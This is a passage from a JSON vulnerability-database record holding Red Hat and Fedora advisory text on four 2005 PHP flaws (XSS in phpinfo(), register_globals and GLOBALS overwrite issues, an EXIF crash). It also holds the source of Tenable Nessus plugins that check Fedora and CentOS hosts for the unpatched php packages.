a\r\nvictim can be tricked into following a malicious URL to a site with a page\r\ndisplaying the phpinfo() output, it may be possible to inject javascript\r\nor HTML content into the displayed page or steal data such as cookies. \r\nThis vulnerability only affects installations which allow users to view the\r\noutput of the phpinfo() function. As the phpinfo() function outputs a\r\nlarge amount of information about the current state of PHP, it should only\r\nbe used during debugging or if protected by authentication. (CVE-2005-3388)\r\n\r\nAdditionally, a bug introduced in the updates to fix CVE-2004-1019 has been\r\ncorrected.\r\n\r\nUsers of PHP should upgrade to these updated packages, which contain\r\nbackported patches that resolve these issues.", "modified": "2018-03-14T19:26:00", "published": "2005-11-10T05:00:00", "id": "RHSA-2005:838", "href": "https://access.redhat.com/errata/RHSA-2005:838", "type": "redhat", "title": "(RHSA-2005:838) php security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-12T10:05:47", "description": "This update includes several security fixes :\n\n - fixes for prevent malicious requests from overwriting\n the GLOBALS array (CVE-2005-3390)\n\n - a fix to stop the parse_str() function from enabling the\n register_globals setting (CVE-2005-3389)\n\n - fixes for Cross-Site Scripting flaws in the phpinfo()\n output (CVE-2005-3388)\n\n - a fix for a denial of service (process crash) in EXIF\n image parsing (CVE-2005-3353)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2005-11-15T00:00:00", "title": "Fedora Core 4 : php-5.0.4-10.5 (2005-1062)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3353", "CVE-2005-3388", "CVE-2005-3389", "CVE-2005-3390"], "modified": "2005-11-15T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:php-xml", "p-cpe:/a:fedoraproject:fedora:php-pgsql", "p-cpe:/a:fedoraproject:fedora:php-gd", "p-cpe:/a:fedoraproject:fedora:php-xmlrpc", "p-cpe:/a:fedoraproject:fedora:php-soap", "p-cpe:/a:fedoraproject:fedora:php-mysql", "p-cpe:/a:fedoraproject:fedora:php-imap", "p-cpe:/a:fedoraproject:fedora:php-pear", "p-cpe:/a:fedoraproject:fedora:php-ldap", "p-cpe:/a:fedoraproject:fedora:php", "p-cpe:/a:fedoraproject:fedora:php-debuginfo", "cpe:/o:fedoraproject:fedora_core:4", "p-cpe:/a:fedoraproject:fedora:php-odbc", "p-cpe:/a:fedoraproject:fedora:php-snmp", "p-cpe:/a:fedoraproject:fedora:php-devel", "p-cpe:/a:fedoraproject:fedora:php-dba", "p-cpe:/a:fedoraproject:fedora:php-mbstring", "p-cpe:/a:fedoraproject:fedora:php-bcmath", "p-cpe:/a:fedoraproject:fedora:php-ncurses"], "id": "FEDORA_2005-1062.NASL", "href": "https://www.tenable.com/plugins/nessus/20187", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2005-1062.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(20187);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_bugtraq_id(15248, 15249, 15250);\n script_xref(name:\"FEDORA\", value:\"2005-1062\");\n\n script_name(english:\"Fedora Core 4 : php-5.0.4-10.5 (2005-1062)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update includes several security fixes :\n\n - fixes for prevent malicious requests from overwriting\n the GLOBALS array (CVE-2005-3390)\n\n - a fix to stop the parse_str() function from enabling the\n register_globals setting (CVE-2005-3389)\n\n - fixes for Cross-Site Scripting flaws in the phpinfo()\n output (CVE-2005-3388)\n\n - a fix for a denial of service (process crash) in EXIF\n image parsing (CVE-2005-3353)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2005-November/001555.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1d743e09\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/11/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/11/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 4.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC4\", reference:\"php-5.0.4-10.5\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"php-bcmath-5.0.4-10.5\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"php-dba-5.0.4-10.5\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"php-debuginfo-5.0.4-10.5\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"php-devel-5.0.4-10.5\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"php-gd-5.0.4-10.5\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"php-imap-5.0.4-10.5\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"php-ldap-5.0.4-10.5\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"php-mbstring-5.0.4-10.5\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"php-mysql-5.0.4-10.5\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"php-ncurses-5.0.4-10.5\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"php-odbc-5.0.4-10.5\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"php-pear-5.0.4-10.5\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"php-pgsql-5.0.4-10.5\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"php-snmp-5.0.4-10.5\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"php-soap-5.0.4-10.5\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"php-xml-5.0.4-10.5\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"php-xmlrpc-5.0.4-10.5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-bcmath / php-dba / php-debuginfo / php-devel / php-gd / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:05:47", "description": "This update includes several security fixes :\n\n - fixes for prevent malicious requests from overwriting\n the GLOBALS array (CVE-2005-3390)\n\n - a fix to stop the parse_str() function from enabling the\n register_globals setting (CVE-2005-3389)\n\n - fixes for Cross-Site Scripting flaws in the phpinfo()\n output (CVE-2005-3388)\n\n - a fix for a denial of service (process crash) in EXIF\n image parsing (CVE-2005-3353)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2005-11-15T00:00:00", "title": "Fedora Core 3 : php-4.3.11-2.8 (2005-1061)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3353", "CVE-2005-3388", "CVE-2005-3389", "CVE-2005-3390"], "modified": "2005-11-15T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora_core:3", "p-cpe:/a:fedoraproject:fedora:php-pgsql", "p-cpe:/a:fedoraproject:fedora:php-gd", "p-cpe:/a:fedoraproject:fedora:php-xmlrpc", "p-cpe:/a:fedoraproject:fedora:php-mysql", "p-cpe:/a:fedoraproject:fedora:php-imap", "p-cpe:/a:fedoraproject:fedora:php-pear", "p-cpe:/a:fedoraproject:fedora:php-ldap", "p-cpe:/a:fedoraproject:fedora:php", "p-cpe:/a:fedoraproject:fedora:php-debuginfo", "p-cpe:/a:fedoraproject:fedora:php-odbc", "p-cpe:/a:fedoraproject:fedora:php-snmp", "p-cpe:/a:fedoraproject:fedora:php-devel", "p-cpe:/a:fedoraproject:fedora:php-mbstring", "p-cpe:/a:fedoraproject:fedora:php-ncurses", "p-cpe:/a:fedoraproject:fedora:php-domxml"], "id": "FEDORA_2005-1061.NASL", "href": "https://www.tenable.com/plugins/nessus/20186", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2005-1061.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(20186);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_bugtraq_id(15248, 15249, 15250);\n script_xref(name:\"FEDORA\", value:\"2005-1061\");\n\n script_name(english:\"Fedora Core 3 : php-4.3.11-2.8 (2005-1061)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update includes several security fixes :\n\n - fixes for prevent malicious requests from overwriting\n the GLOBALS array (CVE-2005-3390)\n\n - a fix to stop the parse_str() function from enabling the\n register_globals setting (CVE-2005-3389)\n\n - fixes for Cross-Site Scripting flaws in the phpinfo()\n output (CVE-2005-3388)\n\n - a fix for a denial of service (process crash) in EXIF\n image parsing (CVE-2005-3353)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2005-November/001556.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fb07e7f7\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-domxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/11/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/11/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^3([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 3.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC3\", reference:\"php-4.3.11-2.8\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"php-debuginfo-4.3.11-2.8\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"php-devel-4.3.11-2.8\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"php-domxml-4.3.11-2.8\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"php-gd-4.3.11-2.8\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"php-imap-4.3.11-2.8\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"php-ldap-4.3.11-2.8\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"php-mbstring-4.3.11-2.8\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"php-mysql-4.3.11-2.8\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"php-ncurses-4.3.11-2.8\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"php-odbc-4.3.11-2.8\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"php-pear-4.3.11-2.8\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"php-pgsql-4.3.11-2.8\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"php-snmp-4.3.11-2.8\")) flag++;\nif (rpm_check(release:\"FC3\", reference:\"php-xmlrpc-4.3.11-2.8\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-debuginfo / php-devel / php-domxml / php-gd / php-imap / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:24:53", "description": "Updated PHP packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA flaw was found in the way PHP registers global variables during a\nfile upload request. A remote attacker could submit a carefully\ncrafted multipart/form-data POST request that would overwrite the\n$GLOBALS array, altering expected script behavior, and possibly\nleading to the execution of arbitrary PHP commands. Please note that\nthis vulnerability only affects installations which have\nregister_globals enabled in the PHP configuration file, which is not a\ndefault or recommended option. The Common Vulnerabilities and\nExposures project assigned the name CVE-2005-3390 to this issue.\n\nA flaw was found in the PHP parse_str() function. If a PHP script\npasses only one argument to the parse_str() function, and the script\ncan be forced to abort execution during operation (for example due to\nthe memory_limit setting), the register_globals may be enabled even if\nit is disabled in the PHP configuration file. This vulnerability only\naffects installations that have PHP scripts using the parse_str\nfunction in this way. (CVE-2005-3389)\n\nA Cross-Site Scripting flaw was found in the phpinfo() function. If a\nvictim can be tricked into following a malicious URL to a site with a\npage displaying the phpinfo() output, it may be possible to inject\nJavaScript or HTML content into the displayed page or steal data such\nas cookies. This vulnerability only affects installations which allow\nusers to view the output of the phpinfo() function. As the phpinfo()\nfunction outputs a large amount of information about the current state\nof PHP, it should only be used during debugging or if protected by\nauthentication. (CVE-2005-3388)\n\nA denial of service flaw was found in the way PHP processes EXIF image\ndata. It is possible for an attacker to cause PHP to crash by\nsupplying carefully crafted EXIF image data. (CVE-2005-3353)\n\nUsers of PHP should upgrade to these updated packages, which contain\nbackported patches that resolve these issues.", "edition": 26, "published": "2006-07-03T00:00:00", "title": "CentOS 3 / 4 : php (CESA-2005:831)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3353", "CVE-2005-3388", "CVE-2005-3389", "CVE-2005-3390"], "modified": "2006-07-03T00:00:00", "cpe": ["p-cpe:/a:centos:centos:php-mbstring", "p-cpe:/a:centos:centos:php-pgsql", "p-cpe:/a:centos:centos:php", "cpe:/o:centos:centos:4", "p-cpe:/a:centos:centos:php-ldap", "p-cpe:/a:centos:centos:php-snmp", "p-cpe:/a:centos:centos:php-gd", "p-cpe:/a:centos:centos:php-mysql", "p-cpe:/a:centos:centos:php-devel", "p-cpe:/a:centos:centos:php-odbc", "p-cpe:/a:centos:centos:php-imap", "p-cpe:/a:centos:centos:php-pear", "p-cpe:/a:centos:centos:php-domxml", "p-cpe:/a:centos:centos:php-xmlrpc", "p-cpe:/a:centos:centos:php-ncurses", "cpe:/o:centos:centos:3"], "id": "CENTOS_RHSA-2005-831.NASL", "href": "https://www.tenable.com/plugins/nessus/21871", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2005:831 and \n# CentOS Errata and Security Advisory 2005:831 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(21871);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2005-3353\", \"CVE-2005-3388\", \"CVE-2005-3389\", \"CVE-2005-3390\");\n script_bugtraq_id(15248, 15249, 15250);\n script_xref(name:\"RHSA\", value:\"2005:831\");\n\n script_name(english:\"CentOS 3 / 4 : php (CESA-2005:831)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated PHP packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA flaw was found in the way PHP registers global variables during a\nfile upload request. A remote attacker could submit a carefully\ncrafted multipart/form-data POST request that would overwrite the\n$GLOBALS array, altering expected script behavior, and possibly\nleading to the execution of arbitrary PHP commands. Please note that\nthis vulnerability only affects installations which have\nregister_globals enabled in the PHP configuration file, which is not a\ndefault or recommended option. The Common Vulnerabilities and\nExposures project assigned the name CVE-2005-3390 to this issue.\n\nA flaw was found in the PHP parse_str() function. If a PHP script\npasses only one argument to the parse_str() function, and the script\ncan be forced to abort execution during operation (for example due to\nthe memory_limit setting), the register_globals may be enabled even if\nit is disabled in the PHP configuration file. This vulnerability only\naffects installations that have PHP scripts using the parse_str\nfunction in this way. (CVE-2005-3389)\n\nA Cross-Site Scripting flaw was found in the phpinfo() function. If a\nvictim can be tricked into following a malicious URL to a site with a\npage displaying the phpinfo() output, it may be possible to inject\nJavaScript or HTML content into the displayed page or steal data such\nas cookies. This vulnerability only affects installations which allow\nusers to view the output of the phpinfo() function. As the phpinfo()\nfunction outputs a large amount of information about the current state\nof PHP, it should only be used during debugging or if protected by\nauthentication. (CVE-2005-3388)\n\nA denial of service flaw was found in the way PHP processes EXIF image\ndata. It is possible for an attacker to cause PHP to crash by\nsupplying carefully crafted EXIF image data. (CVE-2005-3353)\n\nUsers of PHP should upgrade to these updated packages, which contain\nbackported patches that resolve these issues.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-November/012393.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2ba48b5d\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-November/012394.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a7b67205\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-November/012395.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?359a2fea\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-November/012400.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?61d76502\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-November/012401.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e53e54cf\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-November/012402.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?48e764fc\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-domxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/11/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/07/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(3|4)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 3.x / 4.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-4.3.2-26.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", 